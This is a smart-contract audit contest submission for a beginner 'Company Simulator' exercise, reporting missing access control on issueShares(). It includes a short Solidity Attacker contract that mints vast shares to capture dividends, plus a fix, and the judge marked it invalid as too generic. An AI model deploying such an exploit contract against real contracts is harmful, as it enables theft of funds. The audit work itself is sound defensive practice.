Company Simulator

First Flight #51

Beginner FriendlyDeFi

100 EXP

View results

Previous Next

Submission Details

Impact: high

Likelihood: high

Invalid

Unchecked Share Dilution — Allows Attacker to Inflate Ownership and Drain Dividends

quatermain

Root + Impact

Description

The system should only allow new share issuance (minting) proportional to actual capital contribution or authorized actions from the company owner. Each shareholder’s percentage of ownership should remain consistent unless new equity is legitimately added.
The issueShares() function does not verify whether the caller is authorized or whether the total share supply cap has been reached. This allows any external user to mint new shares to themselves, artificially inflating their ownership and enabling theft of future dividends and voting power.

// Root cause in the codebase with @> marks to highlight the relevant section

function issueShares(uint256 _amount) external {

// @> No access control — any caller can execute this

// @> No validation on totalShares or user limits

shares[msg.sender] += _amount;

totalShares += _amount;

}

Risk

Likelihood:

The vulnerability triggers whenever the function is publicly callable and no owner or governance check exists.

It occurs during any normal operational phase since share issuance can be called at any time by any address.

Impact:

An attacker can mint arbitrary shares and claim nearly all dividends during distributeDividends().

This effectively drains all ETH or token profits from the system and permanently corrupts shareholding fairness.

Proof of Concept

When attack() is executed, the attacker becomes the dominant shareholder by minting unlimited shares and subsequently drains all distributed dividends.

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.20;

interface ICompanySimulator {

function issueShares(uint256 _amount) external;

function distributeDividends() external payable;

}

contract Attacker {

ICompanySimulator public target;

constructor(address _target) {

target = ICompanySimulator(_target);

}

function attack() external payable {

// Step 1: Mint unlimited shares to self

target.issueShares(type(uint256).max / 2);

// Step 2: Trigger dividend distribution after minting

target.distributeDividends();

}

// Receives all distributed ETH

receive() external payable {}

}

Recommended Mitigation

• Implement strict access control (e.g., onlyOwner or governance modifier) on share issuance and burning functions.

Add a maximum total supply cap to prevent dilution beyond the intended number of shares.

- remove this code

+ add this code

function issueShares(uint256 _amount) external onlyOwner {

require(totalShares + _amount <= MAX_SUPPLY, "Max supply exceeded");

shares[msg.sender] += _amount;

totalShares += _amount;

}

Updates

Lead Judging Commences

0xshaedyw Lead Judge

5 days ago

0xshaedyw Lead Judge 3 days ago

Submission Judgement Published

Invalidated

Reason: Too generic

Rewards breakdown

nSLOC

265

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.